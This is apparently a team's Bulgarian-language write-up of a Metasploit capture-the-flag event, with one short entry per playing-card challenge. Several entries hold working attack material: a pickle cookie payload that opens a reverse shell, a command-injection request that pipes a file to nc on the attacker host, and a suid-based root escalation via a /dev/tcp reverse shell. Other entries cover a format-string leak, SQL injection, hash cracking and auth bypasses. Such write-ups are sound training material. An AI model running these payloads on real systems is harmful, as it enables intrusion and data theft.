[toc] # Знаменца ## 4 Сърца - 80:  ## 8 Сърца - 4545:  elf file:  с достатъчно `buffalo` (игра на думи за buffer) декриптира .enc RE на elf файла показва, че използва 0x41 за да "криптира" с XOR. (Питайте Десо за повече подрбоности) Пробвах с https://github.com/mstrand/xcat: ``` xcat.py -n 0x41 8_of_hearts.enc > asd.png ``` и бачка:  ## 3 Пика - 8080 :  Като използваш `guest` с каквато и да е парола, response-a се връща за 5 сек. С други случайни имена, връща веднага. Тоест `observational skills` :) Понеже ми беше бавен Burp-a (community eddition), го brute force-нах с: https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack  ## 2 Спатия - 9001 SQLite SQLi (Union) в search field-a.   ## Червен Жокер - 9007   Флага е ясен, но тези zip файлове ? ## Черен Жокер - 8123   `hashcat -m 0 pass_to_crack.txt -a 3 ihatesalt?1?1?1?1?1?1 -i --increment-min 9 --increment-max 15 -1 ?l?d --force -O` /admin ## 6 купа - 6868 ``` curl -i -s -k -X $'GET' \ -H $'Host: 172.15.1.117:6868' \ $'http://172.15.1.117:6868/files/BUDDY/2' ``` ## Дама купа - 9008 и 9010 - decompile на java class-овете с procyon, промяна на AuthState.java (промяна на `loggedIn` от `private` на `public`) и промяна на `this.authState.loggedIn` в Class.java, преди изпращане на аутентикация `AuthState.java`: ```java import java.io.Serializable; import java.util.Base64; // // Decompiled by Procyon v0.5.36 // public class AuthState implements Serializable { private static final long serialVersionUID = 123197894L; public boolean loggedIn; public String username; public AuthState() { this.loggedIn = true; this.username = "Guest"; } public boolean isLoggedIn() { return true; } public void setLoggedInStatus(final boolean loggedIn) { this.loggedIn = true; } } ``` `Client.class`: ```java public void doAuthenticate(final BufferedReader bufferedReader) { try { this.authState.loggedIn = true; this.cliOut.writeObject(this.authState); final String utf = this.cliIn.readUTF(); System.out.println(utf); if (utf.contains("already authenticated")) { return; } // this.cliOut.writeUTF(bufferedReader.readLine()); this.cliOut.writeUTF(this.authState.username); this.cliOut.flush(); System.out.println(this.cliIn.readUTF()); this.authState = (AuthState)this.cliIn.readObject(); } catch (IOException | ClassNotFoundException ex) { System.out.println("Could not retrieve server's message regarding authentication"); } } ```  ## 7 Пика - 8888 @QyskiSXyT0GStc7wr3DmtQ вдигна reverse shell през picle cookie seraliziation: ```python= import pickle import base64 import os class RCE1: def __reduce__(self): # 1. Dump the flag from memory dumpcmd = "with open('/tmp/flag.png', 'wb') as f: f.write(FLAG)" return eval, (dumpcmd,) class RCE2: def __reduce__(self): #2. Spawn reverse shell cmd = """ python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.15.1.116",44444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' """ return os.system, (cmd,) dump_flag = pickle.dumps(RCE1()) rev_shell = pickle.dumps(RCE2()) print('The vuln is in the cookie serilization, here are the malicious payloads') print('1. dump flag from memory:') print(base64.b64encode(dump_flag)) print('2. start a rev shell on the KaliBox p=44444') print('3. rev shel payload:') print(base64.b64encode(rev_shell)) ``` Видяхме в кода на web app-a следното: ```python with (app_path / 'modules_metadata_base.json').open('r') as file_h: msf_modules = json.load(file_h) for module in msf_modules.values(): module['platforms'] = tuple(platform.strip() for platform in set(module['platform'].split(','))) with (app_path / 'flag.png').open('rb') as file_h: FLAG = file_h.read() if not config.DEBUG: (app_path / 'flag.png').unlink() ``` Видяхме, че flag.png вече е изтрит... @QyskiSXyT0GStc7wr3DmtQ се сети, че може да го dump-не от паметта обратно във файл: ``` class RCE1: def __reduce__(self): # 1. Dump the flag from memory dumpcmd = "with open('/tmp/flag.png', 'wb') as f: f.write(FLAG)" return eval, (dumpcmd,) ```  ## 6 Каро - 8200 @QyskiSXyT0GStc7wr3DmtQ отново напрви магия -> RCE през exif мета данните на картинките: http://blog.brian.jp/python/png/2016/07/07/file-fun-with-pyhon.html ## Дама пика - 8202  GraphQL Introspection: ``` POST /api HTTP/1.1 Host: 172.15.1.117:8202 Content-Length: 1552 Pragma: no-cache Cache-Control: no-cache accept: */* authorization: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 content-type: application/json Origin: http://172.15.1.117:8202 Referer: http://172.15.1.117:8202/posts Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SESSION=gAR9lC4= Connection: close {"query":"query CURRENT_USER_QUERY {__schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }" } ``` https://apis.guru/graphql-voyager/  - Request: ``` { "query":"query CURRENT_USER_QUERY {posts{media,title,content}}" } ``` - Response: ``` {"data":{"posts":[{"media":"/cac0babe-1fff-4d85-9070-8d147e76da4b/queen_of_spades.png","title":"Lorem ipsum dolor sit amet","content":"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec interdum ut metus consectetur sodales. Sed et vulputate massa. Nullam consequat fringilla ante, sit amet lacinia ligula egestas et. Mauris imperdiet sodales nisl, sit amet placerat nisi. Pellentesque et ligula at purus convallis vehicula. Aenean ac ullamcorper diam"}]}} ```  ## 9 спатия - 1337 ```python Trying 172.15.1.117... Connected to 172.15.1.117. Escape character is '^]'. Welcome to the '9 of Clubs' service. ------------------------------- Please choose an option: 1. Send contact info 2. Greetings 3. Send feedback 0. Exit 2 Please, enter your name... %9$s Hello Flag_9_of_Clubs{b17ef17454081e89c084d5182d76c527}!!! ``` ## 5 Спатия - 8101 https://hackmd.io/HMeKG6ACROirmj_xFFm75Q ## 2 Купа - 9000 ``` POST / HTTP/1.1 Host: 172.15.1.117:9000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.15.1.117:9000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.15.1.117:9000/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 69 search=$(cat+hidden/2_of_hearts.png+|+base64+|+nc+172.15.1.116+44444) ``` ## Асо Спатия - 9009  - влизаш с `admin` и `password` през ssh - намираш `/opt/vpn_connect`, което е suid binary. Като му подадеш път до лог файл с `-l` ако го няма го създава с потребител `root` и group `admin`, с rw права за `admin`. - С `pspy` виждаш, че при ssh login изпълнява скриптовете в `/etc/update-motd.d/` - Правиш един файл там, след това го едитваш и си вкарваш revshell-a в него - пускаш listener, връзваш се с нова ssh сесия и взимаш `root`. - Флагът е в /etc.  ```bash admin@7a16300c4aee:/opt$ ./vpn_connect -u kor -p kor -l /etc/update-motd.d/1-kor Logging to /etc/update-motd.d/1-kor Unknown username admin@7a16300c4aee:/opt$ cat /etc/update-motd.d/1-kor Attempting to connect to server with kor and kor Connection handled Authentication failed admin@7a16300c4aee:/opt$ ls -la /etc/update-motd.d/1-kor -rwxrwxr-- 1 root admin 93 Dec 6 10:09 /etc/update-motd.d/1-kor admin@7a16300c4aee:/opt$ printf '#!/bin/bash\nbash -i >& /dev/tcp/172.15.1.116/4444 0>&1' > /etc/update-motd.d/1-kor ``` ## 9 Каро - 8201 ```python ./ffuf -u http://intranet.metasploit.ctf:8201/ -H "Host: FUZZ.intranet.metasploit.ctf" -mc 200 -w /usr/share/wordlists/dirb/common.txt articles [Status: 200, Size: 68, Words: 10, Lines: 2] assets [Status: 200, Size: 68, Words: 10, Lines: 2] Articles [Status: 200, Size: 68, Words: 10, Lines: 2] contact [Status: 200, Size: 68, Words: 10, Lines: 2] Contact [Status: 200, Size: 68, Words: 10, Lines: 2] hidden [Status: 200, Size: 95, Words: 8, Lines: 4] <-------------------------- Login [Status: 200, Size: 68, Words: 10, Lines: 2] login [Status: 200, Size: 68, Words: 10, Lines: 2] reports [Status: 200, Size: 68, Words: 10, Lines: 2] Software [Status: 200, Size: 68, Words: 10, Lines: 2] software [Status: 200, Size: 68, Words: 10, Lines: 2] ``` ## 4 Спатия - 8092 изпращаме POST заявка към login.php и пускаме password като array ["apples", "banana"] и излиза като true флага е http://127.0.0.1:8092/completedItCongrats453223232.png ``` user=admin&password[%22%61%70%70%6c%65%22%2c%2b%22%62%61%6e%61%6e%61%22]=&hash= ``` ## 8 каро - 5555 ```python #!/bin/env python from pwn import * import time def find_bombs(row): start = 0 while True: start = row.find("0", start) if start == -1: return yield start start += len("0") r = remote('172.15.1.117', 5555) i = 0 line = r.readline() prev_bomb = [] current_me = 0 log = "" while True: line = r.readline() current_line = line.decode('utf8') print(f"{current_line}") if 'SCORE' not in current_line: if current_line.find('X') > -1: current_me = current_line.find('X') print(f"me @ {current_me}: , bombs: {prev_bomb}") print(f"last step: {log}") r.close() exit() if current_line.find('^') > -1: current_me = current_line.find('^') if 1 <= current_me <= 6 and current_me in prev_bomb: if current_me + 1 in prev_bomb: log = f"1 me @ {current_me} going left, bombs: {prev_bomb}" r.sendline(b'\x5b\x44') # Move left else: log = f"2 me @ {current_me} going right, bombs: {prev_bomb}" r.sendline(b'\x5b\x43') # Move right if 14 >= current_me >= 7 and current_me in prev_bomb: if current_me - 1 in prev_bomb: log = f"3 me @ {current_me} going right, bombs: {prev_bomb}" r.sendline(b'\x5b\x43') # Move right else: log = f"4 me @ {current_me} going left, bombs: {prev_bomb}" r.sendline(b'\x5b\x44') # Move left if current_line.find('0') > -1: prev_bomb = find_bombs(current_line) ``` ``` SCORE: 489 | 0 0 | | 0 | | 0 0 | | 0 0 | | 0 0 | | 0| |0 0 | | 0 0 | | 0 0| | 0^ 0 | CONGRATULATIONS! Check port 7878! ``` на порт 7878 имаше уеб сървър с 8ца каро ``` kali@kali:~$ curl http://172.15.1.117:7878 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Directory listing for /</title> </head> <body> <h1>Directory listing for /</h1> <hr> <ul> <li><a href="flag.png">flag.png</a></li> </ul> <hr> </body> </html> ``` ## 8 Спатия - 1080 socks5 proxychains via 172.15.1.117:1080  И какво имаме на порт 8000: `proxychains curl -i http://127.0.0.1:8000` ```htmlembedded <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Directory listing for /</title> </head> <body> <h1>Directory listing for /</h1> <hr> <ul> <li><a href="8_of_spades.png">8_of_spades.png</a></li> </ul> <hr> </body> </html> ``` ## 9 купа - UDP 53 Сменяме /etc/resolve.conf на `nameserver 172.15.1.117` Пробваме какво ли не... после:  след това:  base64 матрьошка от `txt` записа: